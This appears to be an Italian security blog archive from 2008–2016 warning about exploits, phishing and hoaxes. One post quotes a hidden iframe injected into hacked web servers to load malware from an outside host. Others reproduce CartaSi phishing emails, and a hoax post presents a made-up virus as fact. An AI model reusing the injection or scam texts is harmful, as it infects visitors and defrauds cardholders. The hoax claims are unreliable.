Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio

Inserito da 10 Agosto, 2016 (0) Commenti

Si tratta di :Exploits,Sicurezza

Attenzione aggiornare non appena arriverà la patch ! Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio

I ricercatori di Check Point hanno scoperto quattro gravi vulnerabilità nei driver dei chip Qualcomm. Essendo questi processori molto diffusi, l’azienda ha stimato che oltre 900 milioni di smartphone e tablet Android sono a rischio e potrebbero quindi subire un attacco che consente di ottenere i privilegi di root. I dettagli tecnici sono stati illustrati nel corso della conferenza di sicurezza DEF CON 24 di Las Vegas.Check Point ha rilevato le vulnerabilità in molti smartphone Android, anche quelli arrivati da poco sul mercato, come i Samsung Galaxy S7 e S7 edge, OnePlus 3, LG G5 e HTC 10. Anche il BlackBerry DTEK5, considerato lo smartphone Android più sicuro, è vulnerabile. Questi modelli, così come i Nexus 5X, 6 e 6P di Google, riceveranno sicuramente una patch nei prossimi giorni. Il problema riguarda invece i numerosi dispositivi, ormai abbandonati dai rispettivi produttori, che non verranno mai aggiornati.Le quattro vulnerabilità possono essere sfruttate mediante l’installazione di un malware nascosto in un’app infetta, distribuita tramite APK e camuffata da app legittima. Un simile exploit consente di accedere ai dati personali dell’utente, tracciare gli spostamenti tramite GPS, registrare audio e video, intercettare le password digitate sulla tastiera. Qualcomm ha già rilasciato le patch, ma è necessario attendere tutti i passaggi prima di poter aggiornare lo smartphone. Google ha risolto tre vulnerabilità con gli ultimi update di sicurezza, mentre la quarta verrà risolta a settembre. Purtroppo, la frammentazione di Android complica ulteriormente la situazione. Per verificare se il proprio dispositivo è vulnerabile, Check Point ha pubblicato sul Google Play Store l’app QuadRooter Scanner. Al termine della scansione verrà mostrato l’elenco delle vulnerabilità.

13895358_512930422237753_818979163984878613_n

Fonte: Una vita da social

Categories : Exploits,Sicurezza Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

il virus zyppi_ferox.w_32 ruba 345.800.000 password

Inserito da 10 Gennaio, 2012 (0) Commenti

Si tratta di :Bufale e Hoax

Attenzione si tratta di un virus pericoloso, attualmente la sua payload risiede su una botnet svedese… è stato creato per confessare e convertire coloro che da miscredenti condannano la nascita di nuove religioni. La nascita di questa rete dormiente ha generato una notevole allerta in tutti i siti specializzati. Il terrore della perdita dei propri dati e la conseguente violazione della privacy è da sempre un notevole problema sia in Italia che all’estero.

Un gruppo di hacker Russi devoti al culto della gallina morta ha creato una specie di web spider che sonda le vulnerabilità dei computer che si connettono ai 40 siti più influenti del pianeta. La lista dei siti infetti ed owned non è stata ancora divulgata.

Si tratterebbe di un attacco per difendere la libertà di religione. A titolo di esempio da pochi giorni è stata riconosciuta in Svezia la religione del file sharing questa non è una bufala è una religione di Stato.

Ma tornando ai creatori el virus zyppi_ferox.w_32, questi “crociati” del nuovo millennio hanno come unico obiettivo di  impossessarsi di tutte le vostre password, preferiscono quelle di twitter, ma mirano sopratutto alle password  di facebook.

Che fare ? si consiglia cambiare immediatamente tutte le password dal vostro computer e installare in modo permanete qualsiasi distribuzione LINUX, se gli hacker vedranno qualche OS diverso specialmente windows, devasteranno ogni spazio virtuale che vi appartiene… quindi attenzione…. ogni vostra minuscola briciola di identità virtuale verrà defacciata senza pietà.

Categories : Bufale e Hoax Tags : , , , , , , , , , , , , , , , , , ,

Hacker Russi danneggiano la pompa dell’acqua di un impianto idrico a Springfield, nell’Illinois

Inserito da 23 Novembre, 2011 (0) Commenti

Si tratta di :Exploits

A Springfield, nell’Illinois, alcuni Pirati informatici hanno ottenuto la password del software per gestire un impianto idrico.
Non si capie l’utilità di tale azione, dato che il danneggiamento della pompa dell’acqua ha solo creato un disservizio. Probabilmente i pirati, di origine, Russa volevano attirare l’attenzione sulla vulnerabilità di sistemi che rappresentano delle “Infrastrutture critiche” anche negli Stati Uniti.

Di certo questo genere di attacco non ha nulla di Etico, poichè avere le chiavi di casa altrui non ci autorizza ad entrare e rompere tutto. Un hacker che si rispetti avrebbe scorrazzato un pò ma mai e poi mai avrebbe danneggiato il sistema, poichè lo spirito hacker vieta la distruzione di risorse collettive. Non è razionale comportarsi come criminali, un criminale è un delinquente sia che lo faccia nella vita reale sia che utilizzi internet.

Che senso ha istruire la pompa in modo tale da accendersi e spegnersi ripetutamente ? In genere, comunque non ha senso, aprire una infrastruttura del genere ad internet, basterebbe una rete privata. Di solito basterebbe maggiore attenzione a questi sistemi.

Categories : Exploits Tags : , , , , , , , , ,

servizi on-line di Carta Si – La password del suo accont carta si e stata inserita piu di tre volte.

Inserito da 3 Maggio, 2010 (0) Commenti

Si tratta di :Phishing e Truffe

phishing, tentavivo di truffa
Gentile Cliente,

La password del suo accont carta si e stata inserita piu di tre volte. Per proteggere la sua carta abbiamo sospenso il acceso.
Per recuperare il acceso clicca su :

Per proseguire con l’acquisto clicca qui >

Grazie ancora per aver scelto i servizi on-line di Carta Si.
I migliori saluti.

Servizio Clienti Carta Si

Categories : Phishing e Truffe Tags : , , , , , , , , , , , , , , , , , , , ,

Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Inserito da 15 Settembre, 2009 (0) Commenti

Si tratta di :Exploits

Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Tale tecnica non fa altro che aumentare le macchine zombie.

Cosa avviene in parole semplici :

i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo  installato nginx  potente server  http e un mail proxy  server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.

Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.

Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Categories : Exploits Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

5 suggerimenti dal team di Hotmail per difendersi dai messaggi di posta elettronica indesiderati?

Inserito da 29 Ottobre, 2008 (0) Commenti

Si tratta di :Phishing e Truffe

Ritenendo utile questa e-mail proposta dalla Newsletter, pubblico in versione integrale questa E-mail scritta da Microsoft contro il phishing

Gentile utente,

Hotmail è impegnata a difendere la tua posta dai messaggi indesiderati e ogni giorno vengono bloccati oltre 4,5 miliardi di messaggi in tutto il mondo. Disponiamo di un team dedicato che si adopera costantemente per ridurre ed eliminare i messaggi indesiderati dalle caselle di posta di Hotmail.

Recentemente ci è pervenuta una crescente richiesta di verifica della legittimità di messaggi di posta elettronica ricevuti. Abbiamo quindi creato questa guida per aiutare tutti gli utenti di Hotmail a riconoscere i messaggi indesiderati che riescono a eludere i nostri filtri.

1) Diffida dai messaggi che richiedono i tuoi dati personali.
Qualsiasi messaggio di posta in cui sia richiesto il tuo nome, la data di nascita, il codice fiscale, il nome utente e la password di posta elettronica o qualsiasi altro tipo di dato personale, indipendentemente dal mittente, è quasi certamente un messaggio indesiderato.

Se hai motivo di dubitare che un messaggio sia legittimo, non rispondere al messaggio o non selezionare alcun collegamento ipertestuale. Copia e incolla l’URL oppure visita il sito Web della società per ottenere informazioni sui contatti. Non esitare a contattare il canale di supporto della società per confermare la legittimità del messaggio ricevuto.

2) Leggi attentamente i messaggi di posta elettronica che ti sembrano sospetti.
I messaggi che contengono poche parole, errori ortografici o frasi quali “questo non è uno scherzo” oppure “inoltra questo messaggio ai tuoi amici” in genere sono messaggi indesiderati. Talvolta i nomi o marchi delle società sono scritti in modo errato o impreciso, ad esempio, Windows Hotmail anziché Windows Live™ Hotmail.
3) Proteggi la tua password di Hotmail.
Crea una password sicura per l’account di Hotmail utilizzando più di 7 caratteri e utilizzando una combinazione di caratteri maiuscoli e minuscoli, numeri e caratteri speciali, quali i simboli chiocciola (@) o cancelletto (#). È buona norma inoltre modificare la password regolarmente.

Se ricevi una notifica da parte del Supporto tecnico Microsoft che conferma la tua richiesta di modifica della password, ma recentemente non l’hai modificata, significa che qualcuno sta cercando di ottenere l’accesso al tuo account di Hotmail. In questo caso, cambia immediatamente la password. Per modificare la password, visita il sito all’indirizzo http://account.live.com oppure, dall’interno di Hotmail, fai clic su Opzioni, quindi su Visualizza e modifica le informazioni personali. Ti verrà chiesto di eseguire di nuovo l’accesso. Una volta eseguito l’accesso, cerca”Informazioni sulla reimpostazione della password” visualizzata sotto il nome nella parte superiore della finestra. Cambia sia la password che la domanda e la risposta segrete in quanto tutte possono essere state compromesse.

4) Agisci!
Se pensi che qualcuno abbia utilizzato il tuo account di Hotmail, che la pagina di accesso di Windows Live ID sia falsa o se ricevi un messaggio di posta elettronica sospetto che chiede conferma di una modifica di password che non hai autorizzato, cambia immediatamente la password seguendo le istruzioni sopra indicate oppure visita il sito all’indirizzo: http://account.live.com.
5) Aiutaci ad identificare i nuovi messaggi indesiderati.
Se utilizzi la versione completa di Hotmail, puoi selezionare il menu a discesa accanto a “Posta indesiderata”, quindi selezionare “Segnala tentativo di phishing”. In ogni caso non rispondere al mittente del messaggio.
Per ulteriori informazioni sull’argomento, fai clic qui.
Consigliamo vivamente di conservare questo messaggio come riferimento futuro per poter agire correttamente nel caso tu riceva messaggi indesiderati aiutandoci a mantenere sicura e protetta la tua casella di posta.

Distinti saluti,

Il team di Windows Live Hotmail

*Phishing: termine che indica la pratica di attirare persone ignare su un sito Web contraffatto utilizzando messaggi di posta elettronica all’apparenza autentici, talvolta utilizzando il vero logo dell’organizzazione, nel tentativo di appropriarsi di dati personali importanti, quali i numeri delle carte di credito, le password, gli account o altre informazioni.
Categories : Phishing e Truffe Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Caro Membro CartaSi, CARTA SI SERVIZIO VERIFIED – TRUFFA, PHISHING AI DANNI CLIENTI TITOLARI CARTA SI, ONLINE BANKING

Inserito da 26 Agosto, 2008 (0) Commenti

Si tratta di :Phishing e Truffe

ATTENZIONE TRUFFA, NUOVO TENTATIVO PHISHING AI DANNI DEI CLIENTI CARTA SI

OGGETTO : Caro Membro CartaSi, CARTA SI SERVIZIO VERIFIED

SITO TRUFFA : http://www. mobeli nc.com/ medi a /s i.html

PRIMA COMUNICAZIONE INGANNEVOLE PROVENIENTE DA TERZI, PER IMPOSSESSARSI DEI VOSTRI CODICI DI ACCESSO AL CONTO…..

La sua iscrizione al servizio Verified by Visa e’ avvenuta con successo!
Le ricordiamo, da questo momento, di utilizzare la sua Password personale ogni volta che le verra’ richiesta: in caso contrario l’acquisto non potra’ concludersi.

Grazie ancora per aver scelto i servizi on-line di CartaSi.
I migliori saluti.

Servizio Clienti CartaSi

******************************

**********************************
VUOLE CONTESTARE SU UNA SPESA?

Easy Claim ? il servizio che fa per lei!

****************************************************************
IMPORTANTE! Se ha altre CartaSi deve iscriverle singolarmente al servizio

Inviato ai sensi del Provvedimento in materia di trasparenza delle operazioni e dei servizi finanziari emanato il 25 luglio dalla Banca d’Italia su delibera CICR del 04/04/2003.
****************************************************************

Per favore, non risponda a questa mail: per eventuali comunicazioni, acceda al Portale Titolari (https://titolari.cartasi.it) e ci scriva attraverso ‘Lo sportello del Cliente’: e’ il modo piu’ semplice per ottenere una rapida risposta dai nostri operatori.
Grazie della collaborazione.

Grazie ancora per aver scelto i servizi on-line di CartaSi.
I migliori saluti.

Servizio Clienti CartaSi

****************************************************************
VUOLE CONTESTARE SU UNA SPESA?

Easy Claim ? il servizio che fa per lei!

****************************************************************
IMPORTANTE! Se ha altre CartaSi deve iscriverle singolarmente al servizio

Inviato ai sensi del Provvedimento in materia di trasparenza delle operazioni e dei servizi finanziari emanato il 25 luglio dalla Banca d’Italia su delibera CICR del 04/04/2003.
****************************************************************

Per favore, non risponda a questa mail: per eventuali comunicazioni, acceda al Portale Titolari (https://titolari.cartasi.it) e ci scriva attraverso ‘Lo sportello del Cliente’: e’ il modo piu’ semplice per ottenere una rapida risposta dai nostri operatori.
Grazie della collaborazione.

SECONDA COMUNICAZIONE INGANNEVOLE PROVENIENTE DA TERZI, PER IMPOSSESSARSI DEI VOSTRI CODICI DI ACCESSO AL CONTO…..

Caro CartaSi cliente,
Abbiamo identificato da poco tempo che diversi computer si sono stati collegati al Suo conto Online Banking e sono stati presenti molteplici errori di parola prima del collegamento. Adesso e’ necessario che Lei ci riconfermi le informazioni del Suo presente conto.

Se non riceviamo le informazioni entro il 27 augosto , saremo costretti a sospendere il Suo conto per un periodo indefinito, come se fosse stato usato in scopi fraudolenti. La ringraziamo per la Sua cooperazione in questo problema.
Per confirmare i dati del Suo conto Online Banking cliccare sul seguente link:

https://titolari.cartasi.it/portal/server.pt

La ringraziamo per la Sua pazienza riguardando questo inconveniente.

Copyright © 2008 CartaSi S.p.A. – P.IVA 04107060966

Per assistenza tecnica: numero verde 803.160 (segui le istruzioni della guida vocale e scegli l’opzione Servizi Internet) .
Copyright © 2008 CartaSi S.p.A. – P.IVA 04107060966.

Categories : Phishing e Truffe Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Vulnerabilita’ in Microsoft Excel (MS08-043)

Inserito da 13 Agosto, 2008 (0) Commenti

Si tratta di :Exploits,Sicurezza

Descrizione del problema

Description:

Sono state riscontrate multiple vulnerabilita’ in Microsoft Excel, che
potrebbero essere sfruttate per ottenere informazioni sensibili o per
compromettere un sistema che ne sia affetto.

La prima vulnerabilita’ e’ dovuta ad un errore di corruzione della memoria
durante l’elaborazione di valori index mentre file Excel vengono caricati in
memoria, e potrebbe essere sfruttata per eseguire codice arbitrario.

La seconda vulnerabilita’ e’ dovuta ad un errore di corruzione della memoria
durante l’elaborazione di un array index mentre file Excel vengono caricati in
memoria, e potrebbe essere sfruttata per eseguire codice arbitrario.

La terza vulnerabilita’ e’ dovuta ad un errore di corruzione della memoria
durante l’elaborazione di valori record mentre file Excel vengono caricati in
memoria, e potrebbe essere sfruttata per eseguire codice arbitrario.

La quarta vulnerabilita’ e’ dovuta alla non appropriata eliminazione della
stringa password da parte di Excel quando il file “.xlsx” viene configurato
per non registrare le credenziali, e potrebbe essere sfruttata per ottenere
l’accesso a dati protetti da password su una sorgente di dati remota.

:: Impatto

– – accesso ad informazioni sensibili

:: Soluzioni

Applicare le patch

Excel 2000 SP3:
http://www.microsoft.com

Excel 2002 SP3:
http://www.microsoft.com

Excel 2003 SP2:
http://www.microsoft.com

Excel 2003 SP3:
http://www.microsoft.com

Excel 2007:
http://www.microsoft.com

Excel 2007 SP1:
http://www.microsoft.com

Microsoft Office Excel Viewer 2003:
http://www.microsoft.com

Microsoft Office Excel Viewer 2003 SP3:
http://www.microsoft.com

Microsoft Office Excel Viewer:
http://www.microsoft.com

Microsoft Office Compatibility Pack per Word, Excel, e PowerPoint 2007 File Formats:
http://www.microsoft.com

Microsoft Office Compatibility Pack per Word, Excel, e PowerPoint 2007 File Formats SP1:
http://www.microsoft.com

Microsoft Office 2004 per Mac:
http://www.microsoft.com

Microsoft Office 2008 per Mac:
http://www.microsoft.com

:: Riferimenti

Microsoft:
http://www.microsoft.com

Secunia:
http://secunia.com

FrSirt:
http://www.frsirt.com

CVE Mitre:
CVE-2008-3003
CVE-2008-3004
CVE-2008-3005
CVE-2008-3006

Categories : Exploits,Sicurezza Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Fernando Alonso ferito in un incidente: ATTENZIONE SI TRATTA DI UN TROJAN HORSE (VIRUS)

Inserito da 10 Agosto, 2008 (0) Commenti

Si tratta di :Bufale e Hoax,Leggende Metropolitane,Phishing e Truffe,Sicurezza

FALSO INDIDENTE DEL PILOTA DI FORMULA 1
Fernando Alonso contenente pericoloso virus ! non cliccare !!!

alonso_notiza_falsa

Mi è appena arrrivata una curiosa e-mail dove c’è scritto che il pilota di formula 1 Fernando Alonso è stato coinvolto in uno spavento incidente, non cliccate assolutamnte si tratta di un nuovo tipo di trojan “bancario” alcune case antivirus lo identificano come “Banker.LGC” questo trojan utilizzando questa notizia diffonde una falsa notizia che riguarda il pilota spagnolo, addirittura si dice che è rimasto gravemente ferito in un incidente a Bilbao, a primo impatto sembra una notizia vera, nel corpo del messaggio si trova un collegamento dove si dovrebbe scaricare il video dell’incidente, non appena si clicca viene eseguito un programma che è in grado di rubare in pochi secondi una quantità impressionante di dati sensibili, quali password, numeri e codici segreti di conti correnti. Questo tipo di trojan è molto pericoloso perchè si tratta di una evoluzione non da poco, è un malware ben progettato che riesce a colpire in pochi secondi i nostri pc. Questo genere di operazione ci dimostra che internet è veramente un luogo insicuro e pericoloso dove come nel mondo reale esistono le persone per bene ed esistono “truffatori”, ladri e gente senza scrupoli interessata solo al profitto economico la quale utilizzando le proprie capacità informatiche
in modo assolutamente negativo danneggia i computer altrui, gente che non avendo meglio da fare si arricchisce alle spalle del prossimo, e magari cerca una persona poco esperta per far tramutare il suo pc in uno zombie pronto a lanciare migliaia di virus o ancora peggio essere sfruttato come computer remoto o per subdole operazioni illegali, quindi prestate attenzione !!

riporto il testo integrale

“Il pilota di Formula 1 Fernando Alonso ha avuto un grave incidente stradale, a Bilbao.
Alonso è stato colpito da un’altra auto a un incrocio. Il pilota dell’altro veicolo è morto sul colpo,
mentre Fernando Alonso è in gravi condizioni.
Alonso è ricoverato in ospedale a Bilbao, e i medici parlano di lesioni al midollo“

che dire non hanno limite ! è una vergogna !

Categories : Bufale e Hoax,Leggende Metropolitane,Phishing e Truffe,Sicurezza Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

McAfee Advises on How to Avoid Spam – Most spam messages try to get your machine infected

Inserito da 7 Agosto, 2008 (0) Commenti

Si tratta di :News

McAfee-Advises-on-How-to-Avoid-Spam-2

Nobody wants to login to their email address and find the inbox chucked full with spam messages, especially since said messages are sent out in order to propagate all sorts of malicious software. Most of the times the goal of the spammer is to infect your machine, turn it into a zombie PC in an ever increasing botnet. According to McAfee, company that specializes in risk management and intrusion prevention, there are three things that you must keep in mind in order to stay safe: the most used spam subject lines, the categories they relate to, and a few tips and pointers meant to keep you safe.

Current Spam Categories

As a rule of thumb, spammers will resort to pretty much any trick they can come up with in order to propagate their malicious intents. According to a study recently updated by the McAfee team, the top three spam categories are products and services (36%), adverts (30%) and stock (11%). Other categories include Russian spam (10%), adult services (7%), and last but not least IT related and financial (both 3%). McAfee also included news and Chinese spam in the list of categories, but they ranked in at 0% (perhaps such categories are not very active in July).

The Most Common Spam Subject Lines

Generally speaking, spammers will use any high profile event or any piece of news that might be of general interest, such as the earthquake that devastated China earlier this year, to make up bogus spam messages. Whenever a celebrity makes the headlines, such as Angelina Jolie after the release of “Wanted”, they once again start sending out messages that promise to show her in an unflattering way (most of the times in circumstances that can only be viewed by adult users).

Here are some of the most used spam subject lines: “Cheap rolex, omega, cartier…lowest prices; Raw video of Paris; Look attractive with larger jackhammer; Woman loses nose after dog attack; Stay stronger and harder.” Pretty much every unsolicited message advertising some adult footage of a well known celebrity is spam.

Tips and Pointers to Avoid Spam

If you have to make your email address available to the general public, and by that I mean putting it up on the web, make sure to obfuscate it. Instead of John.Smith@mail.com use the obfuscated version John.smith -at- mail -dot- com. An even better idea would be to use graphic image that depicts your email address.

Do not use the same email address for work related activities and for personal ones. You should have at least two, separate addresses and use them according to the situation. If you want to contact your friends or coworkers then use one email, if you want to post messages on forums or subscribe to newsletters use the other one.

If your Internet service provider offers spam filtering, McAfee suggests that you enable this option. If any spam messages get through the filter, you should report this to your ISP.

Do not provide your email address to any site unless you have read the privacy policy and you agree to it. You must make sure that the web page in question will not sell on your email.

When you receive a spam message, do not open it, do now download any attachments it may include, and never answer back. By replying you are only providing the spammer with confirmation that the email is active, that you are using it frequently.

If a spam message informs you that you need to update your profile info, or verify your bank account details, that message is definitely a phishing attempt. If you click on the web link included in the message you will be directed to a phishing site where the attacker will try to obtain your security credentials.

Your login details are yours to know, and nobody else should get hold of them. Do not give out your username or password to anybody, no matter who requests you to do so.

Make sure to update your security software solution on a regular basis.

Article by By: George Craciun, Security News Editor

Source: http://news.softpedia.com/

Categories : News Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,